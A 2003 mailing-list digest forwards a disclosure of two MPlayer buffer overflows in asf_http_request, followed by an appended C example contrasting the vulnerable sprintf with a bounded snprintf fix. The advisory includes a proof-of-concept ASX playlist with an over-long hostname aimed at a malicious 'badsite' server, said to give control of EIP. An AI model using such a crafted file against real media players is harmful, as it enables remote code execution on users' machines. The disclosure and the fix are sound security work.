[Please upgrade if you use mplayer -- Raju]

This is an RFC 1153 digest. (1 message)

----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]>
From: "Otero, Hernan" <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Mplayer Buffer Overflow
Date: Thu, 25 Sep 2003 19:17:49 -0500

Favorite Linux Player Buffer Overflow

Product: Mplayer
Developers: http://www.mplayerhq.hu
OS: Ported to all *NIX and Win32
Remote Exploitable: YES

The developers have been contacted and the problem was fixed; updating your mplayer version is recommended.

In the source tree there is a file called asf_streaming.c. This file has a function named asf_http_request; that function has two buffer overflows, both in its sprintf lines.

    asf_http_request {
        char str[250];
        ....
        ...
        ..
        sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
        ....
        ...
        ..
        sprintf( str, "Host: %s:%d", url->hostname, url->port );
        ....
        ...
        ..
    }

At first look this may seem unexploitable (because of the MAXHOSTLEN size restriction)... but with an ASX file like the one below, and a "badsite" listening on "badport" that sends "\n\n" as its answer, you can get a buffer overflow with a fully controllable EIP:

    <asx version = "3.0">
      <title>Bad Site ASX</title>
      <moreinfo href = "mailto:[EMAIL PROTECTED]" />
      <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
      <banner href= "images/bannermitre.gif">
        <abstract>Bad Site live</abstract>
        <moreinfo target="_blank" href = "http://www.badsite.com/" />
      </banner>
      <entry>
        <title>NEWS</title>
        <AUTHOR>NEWS</AUTHOR>
        <COPYRIGHT>© All by the news</COPYRIGHT>
        <ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"/>
        <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
      </entry>
    </asx>

Regards,
Hernán Otero
[EMAIL PROTECTED]

------------------------------

End of this Digest
******************

-- 
Raj Mathur    [EMAIL PROTECTED]    http://kandalaya.org/
GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
All your domain are belong to us.   It is the mind that moves

_______________________________________________
ilugd mailing list
[EMAIL PROTECTED]
http://frodo.hserus.net/mailman/listinfo/ilugd
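The sprintf pattern Otero describes, shown beside a bounded replacement, as an added example in C. This is not MPlayer's code and not part of the advisory: the 250-byte buffer and the "Host: %s:%d" format string are taken from the message above, while the function names, the truncation-check policy and the 300-character test hostname are this example's own assumptions, constructed to mirror the long hostname in the ASX entry.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size from the advisory's asf_http_request: char str[250]. */
#define ASF_STR_LEN 250

/* Mirrors the vulnerable shape: a fixed stack buffer filled by sprintf()
 * from an attacker-controlled hostname with no length bound. Kept only to
 * show the bug; never call it with untrusted input (assumed name). */
void asf_host_header_unsafe(const char *hostname, int port)
{
    char str[ASF_STR_LEN];
    /* A hostname longer than about 240 bytes runs past the end of str[]. */
    sprintf(str, "Host: %s:%d", hostname, port);
    (void)str;
}

/* Bytes "Host: %s:%d" needs (excluding the NUL). Lets a test show the
 * overflow arithmetic without executing the unsafe write. */
size_t host_header_len_needed(const char *hostname, int port)
{
    return (size_t)snprintf(NULL, 0, "Host: %s:%d", hostname, port);
}

/* Hardened form: bounded write plus an explicit truncation check.
 * Returns 0 and fills out[] on success, -1 if the header would not fit;
 * the caller should abort the request rather than send a truncated header.
 * (Assumed policy; MPlayer's actual fix is not shown in the advisory.) */
int asf_host_header_safe(char *out, size_t outlen,
                         const char *hostname, int port)
{
    int n = snprintf(out, outlen, "Host: %s:%d", hostname, port);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen > 0)
            out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Constructed input modelled on the advisory's ASX <ref>: 300 'a's. */
    char longhost[301];
    memset(longhost, 'a', 300);
    longhost[300] = '\0';

    char hdr[ASF_STR_LEN];
    printf("bytes needed=%zu, buffer=%d\n",
           host_header_len_needed(longhost, 80), ASF_STR_LEN);
    printf("safe rc=%d for the long hostname\n",
           asf_host_header_safe(hdr, sizeof hdr, longhost, 80));
    printf("safe rc=%d hdr=\"%s\"\n",
           asf_host_header_safe(hdr, sizeof hdr, "badsite", 8080), hdr);
    return 0;
}
```

The unsafe function is never invoked: the overflow arithmetic is shown through host_header_len_needed instead, so the program runs without undefined behaviour. Note that snprintf alone is not the fix; the return-value check is what turns an over-long hostname into a refused request rather than a silently truncated Host header.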
